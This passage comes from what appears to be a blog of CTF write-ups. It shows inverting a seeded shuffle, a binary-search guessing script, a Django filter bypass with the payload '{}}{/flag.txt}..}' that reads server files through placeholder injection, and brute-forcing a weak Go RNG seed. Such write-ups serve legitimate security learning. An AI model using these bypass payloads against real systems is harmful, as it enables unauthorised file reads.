<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">69</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">s</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="n">good</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">true</span><span class="p">;</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">n</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="w"> </span><span class="n">good</span><span class="w"> </span><span class="o">&=</span><span class="w"> </span><span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">];</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">good</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">true</span><span class="p">;</span>
<span class="w"> </span><span class="n">random_shuffle</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">begin</span><span class="p">(),</span><span class="w"> </span><span class="n">s</span><span class="p">.</span><span class="n">end</span><span class="p">());</span>
<span class="w"> </span><span class="n">this_thread</span><span class="o">::</span><span class="n">sleep_for</span><span class="p">(</span><span class="n">chrono</span><span class="o">::</span><span class="n">milliseconds</span><span class="p">(</span><span class="mi">500</span><span class="p">));</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>The source code for the <code>random_shuffle</code> method is not known but there is a hint in of the input checks ...</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">size</span><span class="p">()</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">69</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"a very worthy string"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"i'll give you a clue'"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"just because something says it's random mean it actually is"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">69</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
</code></pre></div>
<p>If we reconnect to the challenge and give it the same sample input like <code>0123456789</code> we'll see that the first shuffled version of that string is always producing the same output:</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"0123456789"</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>nc<span class="w"> </span>challs.n00bzunit3d.xyz<span class="w"> </span><span class="m">10385</span>
<span class="m">4378052169</span>
<span class="m">0578439216</span>
</code></pre></div>
<p>So our task here is to undo the fixed permutation above on the sorted value <code>0123456789</code> so that the first call of <code>random_suffle</code> will apply the permutation again and produce sorted string - leading the <code>amazingcustomsortingalgorithm</code> method to return true immediately and causing the flag to be printed:</p>
<p>The first output line tells us how to invert the permuation:</p>
<div class="highlight"><pre><span></span><code><span class="mf">4</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">character</span><span class="w"> </span><span class="n">at</span><span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="mf">4</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mf">0</span>
<span class="mf">3</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">character</span><span class="w"> </span><span class="n">at</span><span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="mf">3</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mf">1</span>
<span class="mf">7</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">character</span><span class="w"> </span><span class="n">at</span><span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="mf">7</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mf">2</span>
<span class="mf">8</span><span class="w"> </span><span class="mf">...</span>
<span class="mf">0</span>
<span class="mf">5</span>
<span class="mf">2</span>
<span class="mf">1</span>
<span class="mf">6</span>
<span class="mf">9</span>
</code></pre></div>
<p>... resulting in the input value <code>4761058239</code>:</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"4761058239"</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>nc<span class="w"> </span>challs.n00bzunit3d.xyz<span class="w"> </span><span class="m">10385</span>
<span class="m">0123456789</span>
n00bz<span class="o">{</span>FAKE_FLAG<span class="o">}</span>
</code></pre></div>SillyGoose2024-08-04T00:00:00+02:002024-08-04T00:00:00+02:00moormastertag:moormaster.codeberg.page,2024-08-04:/CtfWriteups/sillygoose.html<p>Simple binary search number guessing game. You guess a number and the challenge tells you whether the goal is lower or higher.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span><span class="w"> </span><span class="nn">sys</span>
<span class="n">lower_bound</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">upper_bound</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"sillygoose.log"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span>
<span class="n">found</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">while</span> <span class="ow">not</span> <span class="n">found</span><span class="p">:</span>
<span class="n">attempt</span> <span class="o">=</span> <span class="n">lower_bound</span> <span class="o">+</span> <span class="p">(</span><span class="n">upper_bound</span> <span class="o">-</span> <span class="n">lower_bound</span><span class="p">)</span><span class="o">//</span><span class="mi">2</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">attempt</span><span class="p">))</span>
<span class="n">f</span><span class="o">.</span><span class="n">write …</span></code></pre></div><p>Simple binary search number guessing game. You guess a number and the challenge tells you whether the goal is lower or higher.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span><span class="w"> </span><span class="nn">sys</span>
<span class="n">lower_bound</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">upper_bound</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"sillygoose.log"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span>
<span class="n">found</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">while</span> <span class="ow">not</span> <span class="n">found</span><span class="p">:</span>
<span class="n">attempt</span> <span class="o">=</span> <span class="n">lower_bound</span> <span class="o">+</span> <span class="p">(</span><span class="n">upper_bound</span> <span class="o">-</span> <span class="n">lower_bound</span><span class="p">)</span><span class="o">//</span><span class="mi">2</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">attempt</span><span class="p">))</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"> "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">attempt</span><span class="p">)</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="n">answer</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"< "</span> <span class="o">+</span> <span class="n">answer</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="k">if</span> <span class="s2">"too small"</span> <span class="ow">in</span> <span class="n">answer</span><span class="p">:</span>
<span class="n">lower_bound</span> <span class="o">=</span> <span class="n">attempt</span>
<span class="k">continue</span>
<span class="k">if</span> <span class="s2">"too large"</span> <span class="ow">in</span> <span class="n">answer</span><span class="p">:</span>
<span class="n">upper_bound</span> <span class="o">=</span> <span class="n">attempt</span>
<span class="k">continue</span>
<span class="k">break</span>
<span class="n">flag</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"< "</span> <span class="o">+</span> <span class="n">flag</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"yay"</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"> yay</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></div>Emojibook2021-08-15T00:00:00+02:002021-08-15T00:00:00+02:00moormastertag:moormaster.codeberg.page,2021-08-15:/CtfWriteups/emojibook.html<p>We are presented are django app which allows us to store text notes that can contain special placeholders which will be replaced by emoji images after uploading the note. For example</p>
<div class="highlight"><pre><span></span><code>:grinning_face:
</code></pre></div>
<p>will be resolved to an image file name 1F600.png. The possible emoji keys that can be used …</p><p>We are presented are django app which allows us to store text notes that can contain special placeholders which will be replaced by emoji images after uploading the note. For example</p>
<div class="highlight"><pre><span></span><code>:grinning_face:
</code></pre></div>
<p>will be resolved to an image file name 1F600.png. The possible emoji keys that can be used are specified by the emoj.json file.</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="w"> </span><span class="s2">"grinning_face"</span><span class="o">:</span><span class="w"> </span><span class="s2">"1F600"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"grinning_face_with_big_eyes"</span><span class="o">:</span><span class="w"> </span><span class="s2">"1F603"</span><span class="p">,</span>
<span class="w"> </span><span class="p">...</span>
<span class="p">}</span>
</code></pre></div>
<p>By looking at the forms.py file we can see that before a note gets saved into the database the emoji keys will already be replaced by special place holders containing the file name of the image.</p>
<div class="highlight"><pre><span></span><code><span class="k">class</span><span class="w"> </span><span class="nc">NoteCreateForm</span><span class="p">(</span><span class="n">forms</span><span class="o">.</span><span class="n">ModelForm</span><span class="p">):</span>
<span class="o">...</span>
<span class="k">def</span><span class="w"> </span><span class="nf">save</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">commit</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="n">instance</span> <span class="o">=</span> <span class="nb">super</span><span class="p">(</span><span class="n">NoteCreateForm</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">save</span><span class="p">(</span><span class="n">commit</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span>
<span class="n">instance</span><span class="o">.</span><span class="n">author</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">user</span>
<span class="n">instance</span><span class="o">.</span><span class="n">body</span> <span class="o">=</span> <span class="n">instance</span><span class="o">.</span><span class="n">body</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"{{"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"}}"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">".."</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"emoji.json"</span><span class="p">)</span> <span class="k">as</span> <span class="n">emoji_file</span><span class="p">:</span>
<span class="n">emojis</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">emoji_file</span><span class="p">)</span>
<span class="k">for</span> <span class="n">emoji</span> <span class="ow">in</span> <span class="n">re</span><span class="o">.</span><span class="n">findall</span><span class="p">(</span><span class="s2">"(:[a-z_]*?:)"</span><span class="p">,</span> <span class="n">instance</span><span class="o">.</span><span class="n">body</span><span class="p">):</span>
<span class="n">instance</span><span class="o">.</span><span class="n">body</span> <span class="o">=</span> <span class="n">instance</span><span class="o">.</span><span class="n">body</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">emoji</span><span class="p">,</span> <span class="s2">"{{"</span> <span class="o">+</span> <span class="n">emojis</span><span class="p">[</span><span class="n">emoji</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">":"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)]</span> <span class="o">+</span> <span class="s2">".png}}"</span><span class="p">)</span>
<span class="k">if</span> <span class="n">commit</span><span class="p">:</span>
<span class="n">instance</span><span class="o">.</span><span class="n">save</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_save_m2m</span><span class="p">()</span>
<span class="k">return</span> <span class="n">instance</span>
</code></pre></div>
<p>So a note containing only the grinning_face emoji will be stored as:</p>
<div class="highlight"><pre><span></span><code><span class="cp">{{</span><span class="m">1F600.</span><span class="nv">png</span><span class="cp">}}</span>
</code></pre></div>
<p>What we also see in the forms.py is an attempt to prevent the user from manually entering the internally used placeholders.</p>
<div class="highlight"><pre><span></span><code><span class="n">instance</span><span class="o">.</span><span class="n">body</span> <span class="o">=</span> <span class="n">instance</span><span class="o">.</span><span class="n">body</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"{{"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"}}"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">".."</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
</code></pre></div>
<p>But this mechanism can be tricked if we would enter something like this in a note:</p>
<div class="highlight"><pre><span></span><code>{}}{/flag.txt}..}
</code></pre></div>
<p>After the replacements of {{, }} and .. happened the result still would be a note containig a placeholder in the internal format pointing to the file containing the flag:</p>
<div class="highlight"><pre><span></span><code><span class="cp">{{</span><span class="o">/</span><span class="nv">flag.txt</span><span class="cp">}}</span>
</code></pre></div>
<p>If we open the note again in the browser we will see an image that cannot be displayed. A quick look at the views.py reveals why:</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span><span class="w"> </span><span class="nf">view_note</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">HttpRequest</span><span class="p">,</span> <span class="n">pk</span><span class="p">:</span> <span class="nb">int</span><span class="p">)</span> <span class="o">-></span> <span class="n">HttpResponse</span><span class="p">:</span>
<span class="n">note</span> <span class="o">=</span> <span class="n">get_object_or_404</span><span class="p">(</span><span class="n">Note</span><span class="p">,</span> <span class="n">pk</span><span class="o">=</span><span class="n">pk</span><span class="p">)</span>
<span class="n">text</span> <span class="o">=</span> <span class="n">note</span><span class="o">.</span><span class="n">body</span>
<span class="k">for</span> <span class="n">include</span> <span class="ow">in</span> <span class="n">re</span><span class="o">.</span><span class="n">findall</span><span class="p">(</span><span class="s2">"({{.*?}})"</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span>
<span class="nb">print</span><span class="p">(</span><span class="n">include</span><span class="p">)</span>
<span class="n">file_name</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="s2">"emoji"</span><span class="p">,</span> <span class="n">re</span><span class="o">.</span><span class="n">sub</span><span class="p">(</span><span class="s2">"[</span><span class="si">{}</span><span class="s2">]"</span><span class="p">,</span> <span class="s2">""</span><span class="p">,</span> <span class="n">include</span><span class="p">))</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">file_name</span><span class="p">,</span> <span class="s2">"rb"</span><span class="p">)</span> <span class="k">as</span> <span class="n">file</span><span class="p">:</span>
<span class="n">text</span> <span class="o">=</span> <span class="n">text</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">include</span><span class="p">,</span> <span class="sa">f</span><span class="s2">"<img src=</span><span class="se">\"</span><span class="s2">data:image/png;base64,</span><span class="si">{</span><span class="n">base64</span><span class="o">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">file</span><span class="o">.</span><span class="n">read</span><span class="p">())</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">'latin1'</span><span class="p">)</span><span class="si">}</span><span class="se">\"</span><span class="s2"> width=</span><span class="se">\"</span><span class="s2">25</span><span class="se">\"</span><span class="s2"> height=</span><span class="se">\"</span><span class="s2">25</span><span class="se">\"</span><span class="s2"> />"</span><span class="p">)</span>
<span class="k">return</span> <span class="n">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="s2">"note.html"</span><span class="p">,</span> <span class="p">{</span><span class="s2">"note"</span><span class="p">:</span> <span class="n">note</span><span class="p">,</span> <span class="s2">"text"</span><span class="p">:</span> <span class="n">text</span><span class="p">})</span>
</code></pre></div>
<p>The internal placeholders are replaced with an img tag that contains the image data in base64 format - or in our case the flag. All that is left to do is to look at the source code within the web browser, find that base64 string and decode it to get the flag.</p>Military Grade2021-08-15T00:00:00+02:002021-08-15T00:00:00+02:00moormastertag:moormaster.codeberg.page,2021-08-15:/CtfWriteups/military-grade.html<p>We are presented with a simple webservice written in go which randomly changes the encryption key every 672 ms and outputs the encrypted flag. However if we analyze the seed that is used to initialize the random number generator ...</p>
<div class="highlight"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">changer</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">ticker</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">time</span><span class="p">.</span><span class="nx">NewTicker</span><span class="p">(</span><span class="nx">time</span><span class="p">.</span><span class="nx">Millisecond</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">672</span><span class="p">).</span><span class="nx">C</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="k">range …</span></code></pre></div><p>We are presented with a simple webservice written in go which randomly changes the encryption key every 672 ms and outputs the encrypted flag. However if we analyze the seed that is used to initialize the random number generator ...</p>
<div class="highlight"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">changer</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">ticker</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">time</span><span class="p">.</span><span class="nx">NewTicker</span><span class="p">(</span><span class="nx">time</span><span class="p">.</span><span class="nx">Millisecond</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">672</span><span class="p">).</span><span class="nx">C</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="k">range</span><span class="w"> </span><span class="nx">ticker</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">rand</span><span class="p">.</span><span class="nx">Seed</span><span class="p">(</span><span class="nx">time</span><span class="p">.</span><span class="nx">Now</span><span class="p">().</span><span class="nx">UnixNano</span><span class="p">()</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="p">^</span><span class="mh">0x7FFFFFFFFEFFF000</span><span class="p">)</span>
<span class="w"> </span><span class="o">...</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>... we find out that there are only 13 bits that are chosen randomly in the changer() function.</p>
<div class="highlight"><pre><span></span><code><span class="o">^</span><span class="mh">0x7FFFFFFFFEFFF000</span>
<span class="o">-></span><span class="w"> </span><span class="o">^</span><span class="mo">0111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1110</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span>
<span class="o">-></span><span class="w"> </span><span class="mi">1000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0001</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mo">0000</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span><span class="w"> </span><span class="mi">1111</span>
<span class="w"> </span><span class="o">^</span><span class="w"> </span><span class="o">^</span><span class="w"> </span><span class="o">^</span>
<span class="w"> </span><span class="mi">63</span><span class="w"> </span><span class="n">th</span><span class="w"> </span><span class="n">bit</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">sign</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="o">|</span>
<span class="w"> </span><span class="mi">24</span><span class="w"> </span><span class="n">th</span><span class="w"> </span><span class="n">bit</span><span class="w"> </span><span class="o">|</span>
<span class="w"> </span><span class="mi">12</span><span class="w"> </span><span class="n">bit</span><span class="w"> </span><span class="n">number</span>
</code></pre></div>
<p>So we can simply bruteforce all possible seeds to create "random" encryption keys the same way as the main.go file until the output of the webservice decodes to something that starts with "ractf{".</p>
<div class="highlight"><pre><span></span><code><span class="kn">package</span><span class="w"> </span><span class="nx">main</span>
<span class="kn">import</span><span class="w"> </span><span class="p">(</span>
<span class="w"> </span><span class="s">"bytes"</span>
<span class="w"> </span><span class="s">"crypto/aes"</span>
<span class="w"> </span><span class="s">"crypto/cipher"</span>
<span class="w"> </span><span class="s">"encoding/hex"</span>
<span class="w"> </span><span class="s">"fmt"</span>
<span class="w"> </span><span class="s">"log"</span>
<span class="w"> </span><span class="s">"math/rand"</span>
<span class="w"> </span><span class="s">"net/http"</span>
<span class="w"> </span><span class="s">"os"</span>
<span class="w"> </span><span class="s">"strings"</span>
<span class="w"> </span><span class="s">"sync"</span>
<span class="w"> </span><span class="s">"time"</span>
<span class="p">)</span>
<span class="kd">const</span><span class="w"> </span><span class="nx">rawFlag</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="s">"[REDACTED]"</span>
<span class="kd">var</span><span class="w"> </span><span class="nx">flag</span><span class="w"> </span><span class="kt">string</span>
<span class="kd">var</span><span class="w"> </span><span class="nx">flagmu</span><span class="w"> </span><span class="nx">sync</span><span class="p">.</span><span class="nx">Mutex</span>
<span class="kd">func</span><span class="w"> </span><span class="nx">decrypt</span><span class="p">(</span><span class="nx">ciphertextHex</span><span class="w"> </span><span class="kt">string</span><span class="p">,</span><span class="w"> </span><span class="nx">bKey</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span><span class="p">,</span><span class="w"> </span><span class="nx">blockSize</span><span class="w"> </span><span class="kt">int</span><span class="p">)</span><span class="w"> </span><span class="kt">string</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">ciphertext</span><span class="p">,</span><span class="w"> </span><span class="nx">err</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">hex</span><span class="p">.</span><span class="nx">DecodeString</span><span class="p">(</span><span class="nx">ciphertextHex</span><span class="p">)</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nx">err</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="kc">nil</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">log</span><span class="p">.</span><span class="nx">Println</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="s">""</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="nx">bIV</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="p">[]</span><span class="nb">byte</span><span class="p">(</span><span class="nx">ciphertext</span><span class="p">)[:</span><span class="nx">blockSize</span><span class="p">]</span>
<span class="w"> </span><span class="nx">bCiphertext</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="p">[]</span><span class="nb">byte</span><span class="p">(</span><span class="nx">ciphertext</span><span class="p">)[</span><span class="nx">blockSize</span><span class="p">:]</span>
<span class="w"> </span><span class="nx">block</span><span class="p">,</span><span class="w"> </span><span class="nx">err</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">aes</span><span class="p">.</span><span class="nx">NewCipher</span><span class="p">(</span><span class="nx">bKey</span><span class="p">)</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nx">err</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="kc">nil</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">log</span><span class="p">.</span><span class="nx">Println</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="s">""</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="nx">plaintext</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nb">make</span><span class="p">([]</span><span class="kt">byte</span><span class="p">,</span><span class="w"> </span><span class="nb">len</span><span class="p">(</span><span class="nx">bCiphertext</span><span class="p">))</span>
<span class="w"> </span><span class="nx">mode</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">cipher</span><span class="p">.</span><span class="nx">NewCBCDecrypter</span><span class="p">(</span><span class="nx">block</span><span class="p">,</span><span class="w"> </span><span class="nx">bIV</span><span class="p">)</span>
<span class="w"> </span><span class="nx">mode</span><span class="p">.</span><span class="nx">CryptBlocks</span><span class="p">(</span><span class="nx">plaintext</span><span class="p">,</span><span class="w"> </span><span class="nx">bCiphertext</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">string</span><span class="p">(</span><span class="nx">plaintext</span><span class="p">)</span>
<span class="p">}</span>
<span class="kd">func</span><span class="w"> </span><span class="nx">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">key</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">iv</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="p"><</span><span class="w"> </span><span class="mi">32</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="o">++</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">key</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="nb">append</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span><span class="w"> </span><span class="nb">byte</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="p"><</span><span class="w"> </span><span class="nx">aes</span><span class="p">.</span><span class="nx">BlockSize</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="o">++</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">iv</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="nb">append</span><span class="p">(</span><span class="nx">iv</span><span class="p">,</span><span class="w"> </span><span class="nb">byte</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span>
<span class="w"> </span><span class="p">}</span>
